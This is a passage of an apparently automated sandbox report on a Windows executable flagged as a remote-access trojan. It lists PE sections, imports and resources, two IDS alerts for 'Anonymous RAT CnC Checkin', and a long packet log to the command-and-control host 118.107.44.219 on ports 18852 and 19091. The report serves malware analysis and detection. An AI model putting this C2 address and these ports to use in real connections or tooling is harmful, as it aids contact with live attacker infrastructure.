                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x1a0000x13c00x14005293a0fb2c46166ce21247d17e837639False0.3568359375data4.96958597460067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x1a2500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.3709677419354839
                                                                RT_ICON0x1a5380x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6081081081081081
                                                                RT_MENU0x1a6600x4adataEnglishUnited States0.8648648648648649
                                                                RT_DIALOG0x1a6ac0xf2dataEnglishUnited States0.7148760330578512
                                                                RT_STRING0x1a7a00x40dataEnglishUnited States0.59375
                                                                RT_GROUP_ICON0x1a7e00x22dataEnglishUnited States1.0
                                                                RT_VERSION0x1a8040x314dataEnglishUnited States0.44416243654822335
                                                                RT_MANIFEST0x1ab180x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                                RT_MANIFEST0x1b1280x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012

                                                                Imports

                                                                DLLImport
                                                                COMCTL32.dll
                                                                KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                                USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-27T13:10:23.432699+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449795118.107.44.21919091TCP
                                                                2024-12-27T13:11:34.693883+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449803118.107.44.21919091TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 27, 2024 13:10:19.074223042 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:19.194534063 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:19.194606066 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.586196899 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586251974 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586266041 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586312056 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.586386919 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586400032 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586412907 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586424112 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.586426020 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586441040 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586460114 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.586483002 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.586520910 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586560965 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.586599112 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.705796003 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.705858946 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.705903053 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.710021019 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.756094933 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.808727980 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.808829069 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.808882952 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.812786102 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.812891006 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.812949896 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.821135998 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.821234941 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.822840929 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.829514027 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.829627037 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.829685926 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.837877035 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.838007927 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.838056087 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.846340895 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.846481085 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.846645117 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.854700089 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.854806900 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.854964972 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.863153934 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.863251925 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.863306046 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.871601105 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.871767044 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.872163057 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.879854918 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.879961014 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.880225897 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:20.888262033 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.888339043 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:20.888456106 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.022339106 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.022391081 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.022439957 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.025182962 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.025202036 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.025299072 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.030771971 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.030837059 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.030884981 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.036484003 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.036621094 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.036675930 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.042148113 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.042263985 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.042309046 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.047833920 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.047955036 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.048141956 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.053466082 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.053571939 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.053616047 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.059149981 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.059243917 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.059333086 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.064780951 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.064917088 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.065021992 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.070489883 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.070663929 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.070708036 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.076252937 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.076364994 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.076472044 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.081801891 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.081919909 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.082076073 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.087569952 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.087663889 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.087718964 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.093271017 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.093456984 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.093504906 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.098948002 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.099075079 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.099142075 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.104670048 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.104767084 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.104834080 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.110192060 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.110321999 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.110367060 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.115909100 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.116012096 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.116060972 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.121577024 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.121704102 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.121824980 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.127291918 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.177962065 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.235469103 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.235487938 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.235536098 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.237490892 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.237622976 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.237670898 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.241805077 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.241883039 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.242098093 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.246017933 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.246133089 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.246179104 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.250164986 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.250348091 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.250391006 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.254247904 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.254343987 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.254641056 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.258245945 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.258361101 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.258486986 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.262274981 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.262371063 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.262430906 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.266357899 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.266427040 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.266537905 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.270517111 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.270591974 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.270641088 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.274394989 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.274488926 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.274535894 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:21.278523922 CET1885249786118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:21.278568029 CET4978618852192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.312361956 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.432190895 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:23.432373047 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.432698965 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:23.552122116 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:24.978391886 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:24.981702089 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.101330042 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.101344109 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.101355076 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515129089 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515167952 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515181065 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515228033 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515285015 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515299082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515310049 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515327930 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515330076 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515357971 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515503883 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515516996 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515527964 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.515552044 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.515583038 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.523513079 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.568588018 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.635117054 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.678117990 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.724247932 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.724282980 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.724338055 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.728302956 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.729870081 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.730000019 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.730020046 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.738226891 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.738293886 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.738322020 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744712114 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744735003 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.744766951 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.753221989 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.753343105 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.753365040 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.761482954 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.761584997 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.761600018 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.769900084 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.769957066 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.770039082 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778269053 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778389931 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.778444052 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.786612034 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.786667109 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.786716938 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.794996023 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.795088053 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.795115948 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.803368092 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.803422928 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.803519011 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.843815088 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.843884945 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.925128937 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933429956 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933443069 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.933485031 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.935852051 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.935913086 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.935946941 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.941205978 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.941263914 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.943183899 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.943280935 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.943335056 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.948520899 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.948695898 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.948765039 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.953936100 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.954015970 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.954219103 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.959249020 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.959355116 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.959470034 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.964571953 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.964651108 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.964865923 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.969927073 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.970047951 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.970146894 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.975337029 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.975419998 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.975469112 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.979100943 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.979185104 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.979231119 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.982999086 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.983087063 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.983138084 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.986826897 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.986845016 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.986893892 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.990606070 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.990665913 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.990741968 CET4979519091192.168.2.4118.107.44.219
                                                                Dec 27, 2024 13:10:25.994313955 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.994438887 CET1909149795118.107.44.219192.168.2.4
                                                                Dec 27, 2024 13:10:25.994610071 CET4979519091192.168.2.4118.107.44.219
